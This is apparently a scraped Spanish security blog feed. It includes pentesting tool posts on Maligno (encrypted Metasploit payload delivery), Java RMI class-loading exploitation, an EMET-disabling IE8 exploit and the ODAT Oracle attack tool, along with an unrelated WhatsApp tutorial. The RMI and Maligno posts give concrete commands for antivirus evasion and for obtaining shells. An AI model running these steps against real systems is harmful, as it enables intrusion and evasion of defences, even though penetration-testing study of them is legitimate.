Utilidad de gestión de contraseñas gratuita, de código abierto, multiplataforma y ligera. Funciona bajo Microsoft Windows pero tiene versiones no oficiales para Linux, Mac OS X, iOS, Android y Windows Phone.

10.Mozilla Firefox

 
Navegador web libre y de código abierto desarrollado para Windows, OS X, y Linux, con una versión móvil para Android. Firefox utiliza el motor Gecko para renderizar páginas web, e implementa los estándares web actuales y previstos.

Maligno: un servidor de payloads de Metasploit

$
0
0
En esta ocasión Maligno no tiene que ver con Chema Alonso ;) Se trata de una herramienta de código abierto de la firma Encripto AS para servir payloads de Metasploit en un test de intrusión. Es decir, genera shellcodes con msfvenom y los transmite por HTTP o HTTPS. Eso sí, el shellcode es cifrado con AES y codificado con Base64 antes de enviarse.

Maligno tiene también una parte cliente para descargar el payload de Metasploit cifrado. Una vez que se recibe el shellcode, el cliente lo descodifica, lo descifra y lo inyecta en la máquina objetivo.

Como resultado, obtendremos una sesión de Metasploit evadiendo detecciones...

Para instalarlo echa un vistazo a este vídeo: http://www.youtube.com/watch?v=97A0pXWbz6c o sigue los pasos siguientes:

1.- Instala python-ipcalc (dependencia):

sudo apt-get update && sudo apt-get install python-ipcalc

2.- Descarga y descomprime Maligno:

Maligno v1.1

3.- Genera un certificado auto-firmado con el siguiente script:

./certgen.sh

4.- Configura el servidor Maligno ajustando las opciones en server.conf:

Echa un vistazo al fichero server.conf.explained

5.- Ejecuta el servidor Maligno:

python maligno_srv.py

6.- Genera un cliente:

python clientgen.py -i 0 -f server.conf -o my_client.py

    -i:  Índice del payload (payload especificado en el fichero de configuración del server, empezando desde 0)
    -f: Fichero de configuración del servidor Maligno
    -o: Fichero de salida donde se escribirá el código del cliente

7.- Manejador de Metasploit

Arranca msfconsole con el fichero de recursos generado por Maligno

msfconsole -r reverse_tcp_192.168.0.2_4444.rc

8.- Empieza a conseguir shells!

Explotación de carga de clases de Java RMI con evasión de antivirus

$
0
0
Los servicios Java Remote Method Invocation (RMI) se utilizan en las aplicaciones para permitir que los objetos Java se puedan utilizar desde una ubicación remota sin necesidad de utilizar ningún tipo de autenticación.

Si un cliente invoca la llamada a un método remoto, se pasa al servicio RMI toda la información del objeto Java para que luego sea ejecutado. Al pasar el objeto, el cliente también puede utilizar un cargador de clases que especifica dónde se puede encontrar el código de Java para manipular el objeto, que suele ser una URL apuntando a un archivo Jar. Sin autenticación o verificación, el servidor descarga el objeto Java y lo ejecuta con los mismos permisos que el servicio Java RMI (generalmente SYSTEM).

Cualquiera puede tomar ventaja de este servicio RMI para cargar y ejecutar código Java en el sistema. Además se puede hacer usando Metasploit (busca java_rmi) y para la evasión del antivirus es posible hacer algunos pequeños cambios:

cd /usr/share/metasploit-framework/data/java/metasploit/
cp Payload.class Payload-backup.class
jad Payload.class
sed -i ‘s/spawn/runme/’ Payload.jad
mv Payload.jad to Payload.java
javac Payload.java

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show targets
...objetivos...
msf exploit(java_rmi_server) > set TARGET
msf exploit(java_rmi_server) > show options
...muestra y configura opciones...
msf exploit(java_rmi_server) > exploit


Fuente:JavaRMI Remote Class Loading Exploitation with AV Bypass

Exploit publico para desactivar EMET

$
0
0
Los investigadores de Offensive Security utilizaron un viejo exploit que se aprovecha de una debilidad en la forma en la que IE 8 maneja los objetos en memoria con el fin de eludir ASLR y DEP y lo alteraron para desactivar la protección ofrecida por EMET.

Dado que no conseguían eludir individualmente las técnicas de Heap Spray y Stack Pivot, empezaron a pensar en una manera de desactivar todos ellos a la vez, mediante el desarme de EMET. Y encontraron una variable global en la sección “.data” en EMET.dll que puede activar o desactivar todas las protecciones ROP implementadas por EMET.

"Esto requiere que el atacante construya una cadena de ROP que va a recuperar de forma dinámica la dirección base de EMET.dll y sobrescribir la variable global con un cero".

El código completo está públicamente disponible:
Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass
http://www.exploit-db.com/exploits/33944/

Y en el siguiente vídeo podéis ver el exploit en acción:
http://vimeo.com/99658866


Cómo usar Whatsapp desde tu PC con el simulador Firefox OS

$
0
0
Si hace unos meses veíamos cómo usar Whatsapp desde el PC con Pidgin y el plugin 'whatsapp-purple', hoy veremos otra manera también muy fácil: con el emulador de Firefox OS.

Empezaremos abriendo el Administrador de aplicaciones de Firefox escribiendo en la barra de direcciones: 

about:app-manager

En la parte inferior del administrador pulsaremos el botón 'Iniciar simulador':


Como la primera vez no tendremos instalado el simulador procederemos a instalarlo:

En nuestro caso instalaremos la versión estable (1.3):
 

Una vez instalado ya podremos iniciar el emulador:
 

Ahora iremos al MarketPlace y buscaremos e instalaremos la aplicación ConnectA2, una aplicación de mensajería instantánea para Firefox OS compatible con Whatsapp:


Después indicaremos nuestro alias, el país, el número de teléfono y marcaremos la opción 'Whatsapp NET experimental'. Posteriormente recibiremos un SMS para validar el usuario:
 

El siguiente paso será permitir que la aplicación acceda a nuestros contactos:
 

Evidentemente nuestra lista de contactos aparecerá vacía, por lo que lo último que nos queda es añadir alguno para probar. En nuestro caso, lo importaremos desde una cuenta de Gmail:



Y ya podremos wasapear con nuestros contactos desde el emulador/ordenador!
 

ODAT (Oracle Database Attacking Tool): comprueba la seguridad de tu base de datos Oracle

$
0
0
ODAT (Oracle Database Attacking Tool) es una herramienta de código abierto para comprobar la seguridad de una base de datos Oracle de forma remota.

Ejemplos de uso de ODAT:


- tienes una base de datos Oracle escuchando remotamente y quieres encontrar SIDs válidos y credenciales para conectarte.
- tienes una cuenta válida en una base de datos Oracle y quieres escalar privilegios (por ejemplo SYSDBA)
- tienes una cuenta válida en una base de datos Oracle y quieres ejecutar comandos en el sistema operativo que la hospeda (por ej. para un shell inverso)



Características:

- buscar un SID válido en un listener remoto a través de: un ataque de diccionario / un ataque de fuerza bruta / ALIAS del listener
- buscar cuentas de Oracle usando: un ataque de diccionario / cada usuario de Oracle como la contraseña
- ejecutar comandos de sistema en el servidor de base de datos mediante: DBMS_SCHEDULER / JAVA / tablas externas / oradbg
- descargar los archivos almacenados en el servidor de base de datos mediante: UTL_FILE / tablas externas / CTXSYS
- subir archivos en el servidor de base de datos mediante: UTL_FILE / DBMS_XSLPROCESSOR / DBMS_ADVISOR
- borrar archivos usando: UTL_FILE
- enviar/recibir peticiones HTTP desde el servidor de base de datos usando: UTL_HTTP / HttpUriType
- escanear puertos del servidor local o un servidor remoto usando: UTL_HTTP / HttpUriType / UTL_TCP
- explotar el CVE-2012-313 (http://cvedetails.com/cve/2012-3137)


Instalar/Dependencias

ODAT es
sólo compatible con Linux. Existe una versión standalone con el fin de no tener que instalar las dependencias y sqlplus (ver la carpeta de compilación del git). El ODAT standalone se generó mediante PyInstaller.

Si quieres tener la versión de desarrollo, son necesarias las siguientes herramientas y dependencias:

- Lenguaje: Python 2.7
- dependencias de Oracle : Instant Oracle básica Instantáneas y sdk Oracle
- Bibliotecas de Python: cx_Oracle con las siguientes recomendadas - colorlog / termcolor / argcomplete / PyInstaller

Puede descargar ODAT standalone aquí:


32-Bit – odat-linux-libc2.19-i686.tar.gz
64-Bit – odat-linux-libc2.19-x86_64.tar.gz 


O lee más información aquí.

Fuente:  ODAT (Oracle Database Attacking Tool) – Test Oracle Database Security
Viewing all 1656 articles
Browse latest View live